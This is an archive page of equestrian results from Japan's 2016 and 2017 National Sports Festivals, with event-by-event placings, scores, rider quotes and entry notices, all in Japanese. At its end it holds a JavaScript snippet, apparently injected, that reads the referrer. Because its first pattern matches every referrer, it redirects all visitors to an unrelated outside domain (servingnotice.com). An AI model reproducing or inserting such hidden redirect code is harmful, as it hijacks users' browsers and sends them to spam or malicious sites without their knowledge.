アーカイブ:

国体関連
2017 年 10 月 9 日
《えひめ国体馬術競技》最終日速報

《愛顔つなぐえひめ国体》は10月9日、最終日を迎えました。

【第21競技 成年女子 自由演技馬場馬術競技】
 この競技には14人馬が出場、2人馬が70%を超えました。第2日の馬場馬術競技(規定演技)に続いて優勝したのは中村公子&パシフィックB(奈良県)で72.450%を獲得しました。2位は71.725%の杉山春恵&エドワードエクリュ(神奈川県)、3位は67.200%の中田晴香&デミーロ(岡山県)でした。


▲中村公子&パシフィックB
「とにかくミスをしないように気を付けて乗りました。馬が本当に調子良く、演技中の手応えも良かったです。奈良県が初日から良い流れできていたことも大きかったです。今のパシフィックBと私のコンビのベストの演技ができました」

【第22競技 少年 トップスコア競技】
 この競技には25人馬が出場し、3人馬が1000点を超えました。出番1番の地元選手、村上晃信&島風がいきなり1110点を出してしばらく首位を守っていましたが、櫻井綾音&C'sセシル(奈良県)が1310点でそれを上回ってトップに。その後に1040点を出した山本文賀&ゲンスターグランツ(神奈川県)が3位に入りました。


▲櫻井綾音&C’sセシル
「初めて出場した国体で優勝することができて、めっちゃ嬉しいです。みんなが考えてくれた通りのコースで行けなかったところもありましたが、馬が助けてくれました。ジョーカーを2回クリアして、1000点を超えられて良かったです」

【第23競技 成年男子 六段障害飛越競技】
 この競技には17人馬が出場、最終障害150cmからスタートしました。11人馬が進んだ第1回ジャンプオフは163cm、9人馬が進んだ第2回ジャンプオフは173cm、そして4人馬が進んだ第3回ジャンプオフは最終障害が183cmにまで上がりました。4人馬とも果敢にチャレンジしましたがクリアラウンドは出ず、藤谷喜晴&ザンジバル(和歌山県)、増山大治郎&オーロラボレアリス(茨城県)、安田一彦&ニックナック・アイ(香川県)の3人馬が1落下で同率優勝となりました。


▲同率優勝の3人。(左から)増山大治郎、安田一彦、藤谷喜晴

 総合優勝は101点を獲得した奈良県、2位は開催県の愛媛県(61点)、3位は岡山県(54点)となりました。


▲総合優勝の奈良県チーム
「初日から好調で、全頭・全選手が入賞することができました。総合優勝は12年ぶりで、とても嬉しいです。昨年亡くなった畑中博文元会長も喜んでくれていると思います」(監督:岡村実)

《えひめ国体馬術競技》の全結果はこちらから(外部リンク)。
 

aaaa
国体関連
2017 年 10 月 8 日
《えひめ国体馬術競技》第4日速報-その2

【第18競技 成年男子 国体大障害飛越競技】
 昨年までは《成年男子 標準障害飛越競技》でしたが、今年から140cmクラスにレベルアップして競技名も変わりました。21人馬が出場しましたが、オリジナルコースをクリアラウンドしたのは4人馬でした。ジャンプオフでは最初に走行した広田龍馬&ライフ・イズ・ビューティフル(栃木県)が、減点0、32.98秒でゴールしました。最終出番の鯨岡啓輔&クワイトライト(東京都)が勝負をかけて走って31.90秒を出しましたが、最終障害で惜しくも落下して3位に。2位は減点0、33.69秒の髙田潤&ジルヴァーナ(京都府)でした。


▲広田龍馬&ライフ・イズ・ビューティフル
「今日はブチくんが頑張ってくれました。2日目のスピード&ハンディネスでは大失敗をしてしまったのですが、今日はみなさんのサポートがあって自分でも満足のいく走行ができました。順位はまだわからなかったのですが、良い走行ができたことが嬉しく、また、観客の皆さんへの『観てくれてありがとう!』という気持ちで、感謝のウィニングランをしました」

【第19競技 成年女子 トップスコア競技】
 この競技に出場したのは25人馬。出番1番の山内のぞみ&フレーゲルZ(鹿児島県)がいきなり1470点を出しました。これを上回る得点はなかなか出ませんでしたが、競技終盤に佐藤泰&如意(長野県)が1610点、そして山口真奈&ジュリアス・ファータ(東京都)が1600点を出して1位と2位を確保、最終的に山内&フレーゲルZは3位入賞となりました。


▲佐藤泰&如意
「去年2位だったので、今年は優勝したいという気持ちがすごくありました。スピードを出して走って、予定通りの走行ができました。レベルの高い競技でびっくりしましたが、ギリギリで勝てて良かったです」

【第20競技 少年 ダービー競技】
 長丁場のダービーコースに22人馬が挑戦し、5人馬がクリアラウンドしてジャンプオフに進みました。先に走行した3人馬にはいずれも1落下がありましたが、最後から2番目の有田奏司郎&クエブA(兵庫県)が攻めて走ってクリアラウンド、30.94秒をマークしました。最終出番の柳田瑛祐&ロイヤルクラス(鹿児島県)がさらに攻め、1秒以上もタイムを縮めて29.76秒で優勝を掴みとりました。3位は減点4のうちタイムが早かった武道芙紀&シロッコプラダ(埼玉県)でした。


▲柳田瑛祐&ロイヤルクラス
「ロイヤルクラスはそこまで足の速い馬ではないのですが、絶対に飛んでくれるので、どの馬よりもショートカットしました。去年の国体では自分のミスで順位が悪く、それがとても悔しかったので、この1年ロイヤルクラスと一緒に頑張ってきました。それが実ったのかなと感じています」
 

aaaa
国体関連
2017 年 10 月 8 日
《えひめ国体馬術競技》第4日速報-その1

《愛顔つなぐえひめ国体》は大会4日目に5つの競技が行われました。

【第12競技 少年 団体障害飛越競技】
 この競技は2人でチームを組み、1人は自県の馬、もう1人は相手県の馬に乗って走行し、その総減点で勝負が決まります。12チームが出場し、大会2日目に第1回戦と準々決勝を実施、4チームが今日の準決勝に勝ち上がりました。そこから決勝に進んだのは熊本県と福島県。熊本県の吉永翔司と平山直人が総減点8で優勝、福島県の若狭椎奈と柴田祐紀が総減点20で2位となりました。3位は京都府(伊瀬知樹・堀江一磨)でした。


▲吉永翔司&アルフィーエンブレム
「相手の馬だったので、考え過ぎずに必死に乗るように心がけました。決勝では絶対に落としたらダメだという気持ちで走りました。優勝が決まった瞬間はただ嬉しい、それだけでした」


▲平山直人&菊酔
「自馬だったので、できるだけ減点0で帰ってきたいと思っていたのですが、どの走行でも1落下以上してしまって、吉永に助けてもらって良かったです」

【第17競技 少年 自由演技馬場馬術競技】
 この競技には13人馬が出場しました。福岡珠緒&ティーダ(岡山県)が71.925%をマークしてこの競技3連覇を達成、僅差の71.150%まで迫った重藤エディット彬&エドワードエクリュ(神奈川県)が2位、楠本将斗&ドミナス(奈良県)が67.950%で3位、上位3人馬は規定演技と同じ順位でした。


▲福岡珠緒&ティーダ
「規定演技と自由演技で目標だった3連覇を達成できてホッとしました。今日は活発に、積極的に乗ることができたのですが、ミスもいくつかあって課題も見つかりました。来年まで少年競技に出られる年齢なので、4連覇を目標に頑張ります」

aaaa
国体関連
2017 年 10 月 7 日
《えひめ国体馬術競技》第3日速報-その2

【第15競技 成年女子 標準障害飛越競技】
 この競技には22人馬が出場し、ちょうど半数の11人馬がジャンプオフに進みました。最初にジャンプオフを走ったベテランの川口雅美&サムライブルー(静岡県)が、ダブルクリアラウンドして33.39秒の早いタイムでトップに立ちました。それを上回ったのは朴本真侑&ラスベガスS(愛知県)の32.74秒。後続の人馬がこのタイムを縮めることはなく、朴本&ラスベガスSの優勝が決まりました。2位は川口&サムライブルー、3位は34.29秒の広田思乃&ライフ・イズ・ビューティフル(栃木県)でした。


▲朴本真侑&ラスベガスS
「最近全然結果を残せていなかったのですが、やっと勝つことができました。初めの走行はすごく緊張していたのですが、馬の調子が良かったので、ジャンプオフではやるしかないと思ってとにかく走りました。結果を出すことができて嬉しいです」

【第16競技 少年 リレー競技】
 2組の人馬が1つのコースを回るリレー競技は、スピード&ハンディネス方式で実施されます。この競技には19チームが出場しました。奈良県の森田麻由&ウロボロスと楠本将斗&ジャンヌのコンビがノーミスで57.19秒を出して優勝、大阪府の中村瞬&ハニーディップと長田芽依&ザローマが60.07秒で2位、鹿児島県の本富士雄&ディナスティと上村司&ザ・ビーチが61.33秒で3位となりました。


▲楠本将斗と森田麻由
「最初で最後の国体で優勝することができてとても嬉しいです。満点でタイムもカバーできるように小回りして走りました」(森田)
「リレーのところもうまくいきました。とにかく走りました。踏み切りが合わないところもありましたが、馬が助けてくれました」(楠本)

aaaa
国体関連
2017 年 10 月 7 日
《えひめ国体馬術競技》第3日速報-その1

《愛顔つなぐえひめ国体》は大会3日目に5つの競技が行われました。

【第8競技 成年男子 国体総合馬術競技】
 馬場馬術と障害馬術の2種目で実施する国体総合馬術競技には17人馬が出場しました。注目は5連覇がかかる細野茂之&将軍I(東京都)。昨日の馬場馬術では減点43.0でトップの成績でしたが、1.6点差で稗田龍馬&クエブA(兵庫県)が追う展開でした。障害馬術の出番は馬場馬術の順位のリバースオーダーです。稗田&クエブAが減点0でゴールしてプレッシャーをかけましたが、細野もノーミスでゴールして5連覇を達成しました。3位は佃日出彦&アビゲイル(静岡県)でした。


▲細野茂之&将軍I
「5連覇を達成できて嬉しいです。乗るまでは緊張していたのですが、乗ったら馬の調子がとても良かったので『これはいい』と思いました。勝ちたいところで勝てたということは、勝負者としてとても嬉しいです」

【第13競技 成年男子 自由演技馬場馬術競技】
 初日の《成年男子 馬場馬術競技》に続き、リオデジャネイロオリンピック代表の2人が高得点をマークしました。高橋正直&ファブリアーノ58(群馬県)は図形にも工夫を凝らしたプログラムで74.650%を獲得して1位、ミスが多かったと振り返った原田喜市&デミーロ(岡山県)は71.300%で2位。2人馬が70%を超えました。3位は吉村喜信&ルードシャネロ(福井県)66.725%でした。


▲高橋正直&ファブリアーノ58
「規定演技の時と同様にいいフィーリングで乗ることができて良かったです。駈歩区間では、山形乗りや蛇乗りの中で連続踏歩変換を入れるなど難度も取り入れました。皆さんが応援してくださって本当にありがたかったです」

【第14競技 少年 二段階障害飛越競技】
 この競技には24人馬が出場し、10人馬が第2段階に進みました。ノーミスでゴールした5人馬のタイム勝負となりました。第2段階を22.65秒で駆け抜けた小栗麻莉乃&マリアンモナーク(岐阜県)が優勝、鹿戸雄翔&オーロラボレアリス(茨城県)が25.15秒で2位、小林章人&ノヴォダマスコ(長野県)が26.79秒で3位となりました。


▲小栗麻莉乃&マリアンモナーク
「第1段階はとにかく落とさないように体を起こして待つ作戦、第2段階はとにかく走る作戦でした。国体には独特のプレッシャーがありますが、県に貢献できたので良かったです」

aaaa
国体関連
2017 年 10 月 6 日
《えひめ国体馬術競技》第2日速報

《愛顔つなぐえひめ国体》は大会2日目に6つの競技が行われました。

【第7競技 成年女子 馬場馬術競技】
 セントジョージ賞典で実施するこの競技には14人馬が出場しました。正確な演技を見せた中村公子&パシフィックB(奈良県)が71.157%の高得点で優勝、杉山春恵&エドワードエクリュ(神奈川県)が68.394%で2位、北川真弓&リカント(三重県)が66.473%で3位となりました。


▲中村公子&パシフィックB
「昨年は自分自身が怪我をして参加できませんでした。今年は復活して、しかも国体で初優勝することができて本当に良かったです。今日は馬がちょうどいいテンションだったので、とても乗りやすかったです。この結果は素直に嬉しいです」

【第9競技 成年女子 ダービー競技】
 この競技には22人馬が出場してジャンプオフには5人馬が進みました。開催県愛媛代表の本田成美&アドミラルヴェンチャーが31.53秒の好タイムを出しましたが、その後に走行した古川芙三子&ファルコン(福岡県)が小回りを駆使して31.37秒でトップに立ちました。最後に走行した増田真七海&ドン コサック(長野県)がそれを上回るタイムを出しましたが、走行後に出血が確認されたため、この競技において失格となりました。1位は古川&ファルコン、2位は本田&アドミラルヴェンチャー、そして3位には32.12秒の松永佳子&ユーディドイット(宮城県)が入りました。


▲古川芙三子&ファルコン
「1回目の走行では明後日の少年ダービーに使うことを意識して乗りました。ジャンプオフでは誰よりも小回りをして、馬がそれに応えてくれました。少年ダービーにつながる内容の走行ができたと思います」

【第10競技 少年 標準障害飛越競技】
 出場23人馬中14人馬がオリジナルコースを減点0でゴールする大接戦となった少年標準障害飛越競技。そのうち10人馬がジャンプオフもクリアラウンドしました。6番目に走行した安西紘一&フェリックス(千葉県)が26.57秒を出して、後続がそれを追う展開でしたが、このタイムに届く人馬は現れず、安西&フェリックスが優勝。2位は木村友哉&C'sセシル(奈良県)28.36秒、3位は杉本瑞生&サンドウィッチ・コア(福島県)28.58秒でした。


▲安西紘一&フェリックス
「初めての国体参加で、これまでに出た大会よりもずっと緊張しました。今までは120cmクラスでは落下することが多かったので、今日は落とさないように遠めから踏み切ることを意識していました。フェリと(福島)大輔さんのおかげで勝つことができました」

【第11競技 成年男子 スピードアンドハンディネス競技】
 出場24人馬中、ノーミス走行は6人馬という難コースでした。4番目に走行した仁田原知毅&アザモア(福井県)が66.66秒を出しましたが、すぐに岩館正彦&C'sセシル(奈良県)が61.93秒と一気にタイムを詰めて首位に立ちました。タイムが更新しないまま迎えた最終出番は福島大輔&ヴェリシナ(千葉県)。攻めの走行を見せて59.60秒でゴールしましたが、1落下があって4秒が加算されたため、63.60秒でトップには届かず。岩館&C'sセシルが優勝、福島&ヴェリシナが2位、仁田原&アザモアが3位となりました。


▲岩館正彦&C’sセシル
「この優勝は奈良県のチームワークのおかげです。奈良は昨日からすべての競技で入賞して、良い調子で来ていたので、僕も続くことができるようにと思って走りました。序盤から良いリズムがつくれたので、それを維持したままゴールまで行くことを意識して走ったら良いタイムにつながりました」

 なお、《第8競技 成年男子 国体総合馬術競技》は馬場馬術競技を終えました。明日(10月7日)障害飛越競技を実施して順位が決定します。《第12競技 少年 団体障害飛越競技》は第1回戦と準々決勝が行われました。明後日(10月8日)の準決勝・決勝で順位が決定します。

《えひめ国体馬術競技》をインターネットで配信しています。視聴はこちらから
 

aaaa
国体関連
2017 年 9 月 22 日
《愛顔(えがお)つなぐえひめ国体》出番表掲載
10月5日から9日まで兵庫県三木市・三木ホースランドパークにて開催します《愛顔(えがお)つなぐえひめ国体 馬術競技会》の組合せ抽選会が、去る9月11日、(公財)日本体育協会の視察員立ち合いの下で行われ、各競技の出番が決定しました。

《愛顔(えがお)つなぐえひめ国体 馬術競技会》出番表はこちらから
aaaa
国体関連
2017 年 8 月 24 日
《愛顔(えがお)つなぐえひめ国体》参加申込関係書類の提出について
10月5日から9日まで、兵庫県 三木ホースランドパークにて開催される《第72回国民体育大会(愛顔(えがお)つなぐえひめ国体)馬術競技会》において、愛媛県の大会実行委員会から各都道府県馬術連盟宛にご案内のとおり、「国民体育大会参加申込システム」に基づく参加申込以外に書類提出が求められておりますのでご案内いたします。

以下のリンク先からダウンロードの上、9月6日(水)必着でご提出ください。

【外部リンク:えひめ国体ホームページ】
第72回国民体育大会(愛顔(えがお)つなぐえひめ国体)馬術競技会へ
参加される関係者の皆様(選手・監督等)へのお知らせ



aaaa
国体関連
2017 年 4 月 19 日
【再掲】《愛顔(えがお)つなぐえひめ国体》リハーサル大会実施要項
第72回国民体育大会《愛顔(えがお)つなぐえひめ国体》リハーサル大会の実施要項が発表されましたのでお知らせいたします。

期 日:平成29年6月3日(土) ~ 4日(日)
会 場: 三木ホースランドパーク(兵庫県三木市別所町高木)

実施要項や申込手続き等のご確認は、こちら(外部リンク)から。※馬事衛生対策要項もご覧いただけます。


2017.3.29 掲載
2017.4.19 更新(馬事衛生対策要項に関する記述を追記)
aaaa
国体関連
2016 年 10 月 6 日
《いわて国体》馬術競技最終日速報

 第71回国民体育大会《希望郷いわて国体》馬術競技は、最終日の今日(10月6日)、3競技を実施しました。

【第21競技 成年女子 自由演技馬場馬術競技】
 この競技には13人馬が出場しました。初日2位だった髙田茉莉亜(東京都)が今日はロリオットとのコンビで72.900%のハイスコアで優勝、2位に奥西真弓&ウルバヌス(三重県)69.525%、3位は地元岩手県の黒須晴子&ロリノが63.150%で入りました。


▲髙田茉莉亜&ロリオット ©UPP
「馬の調子がとても良かったので、馬を信じで演技をしました。音楽に合わせた練習をしていなかったのですが、音楽にもぴったり合わせることができて良かったです。規定演技で2位で、自由演技では絶対に勝とうと思っていたので嬉しいです」

【第22競技 少年 トップスコア競技】
 この競技には23人馬が出場、上位陣はハイレベルな戦いとなりました。2連覇中の大久保渓&ジュリアス・ファータ(東京都)が1450点を出すと、仁田原知毅&ザローマ(福岡県)がスピードと小回りで攻めて1600点で首位に立って後続を振り切りました。今大会好調の木村早希子&ヴェリシナ(千葉県)が1500点で2位に入りました。


▲仁田原知毅&ザローマ
「他の種目で成績を出せず悔しい思いをしていたので、絶対に勝ちたいと思って攻めました。ザローマがすごく頑張ってくれて、思った通りの走行ができました。最高です。気持ち良く帰れます」

【第23競技 成年男子 六段障害飛越競技】
 国体馬術競技を締めくくる六段障害飛越競技。最終障害150cmからスタートして、4回目のジャンプオフでは189cmに上がりました。このジャンプオフに臨んだのは2人馬。福島大輔&グラムアー(千葉県)が最終障害を落下して減点4で優勝しました。2位は小宅俊継&トゥワイス(石川県)、第5障害を落下した後、最終障害で拒止しましたが、斜めからアプローチして完飛しました。3位は古田慶幸&クレイジーコーラル(茨城県)でした。


▲福島大輔&グラムアー
「この馬が六段飛越競技は初めてだったので、どこまでできるのか不安でした。最終障害は高くて馬もびっくりしてしまって、踏み切りが弱くなってしまいました。でも、優勝できて良かったです」

 また、天皇杯(男女総合優勝)と皇后杯(女子総合優勝)はともに東京都でした。

▲天皇杯・皇后杯優勝の東京チーム

aaaa
 

アーカイブ:

  • 2017.11.02
  • 2017.11.19
  • 2017.11.12
  • 2017.11.17
  • 2017.10.16
  • 2017.11.17
  • 2017.11.02
  • 2017.11.02
  • 2017.10.09
  • 2017.10.31
  • 2017.10.12
  • 2016.05.06
  • 2017.08.31


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;